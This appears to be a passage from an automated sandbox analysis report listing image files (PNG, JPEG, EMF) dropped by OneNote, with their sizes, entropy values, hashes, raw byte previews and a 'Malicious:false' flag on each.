                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):27862
                                                                                                        Entropy (8bit):7.238903610770013
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                        MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                        SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                        SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                        SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2104
                                                                                                        Entropy (8bit):7.252780160030615
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                        MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                        SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                        SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                        SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52945
                                                                                                        Entropy (8bit):7.6490972666456765
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                        MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                        SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                        SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                        SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):33032
                                                                                                        Entropy (8bit):2.941351060644542
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                        MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                        SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                        SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                        SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                        Malicious:false
                                                                                                        Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
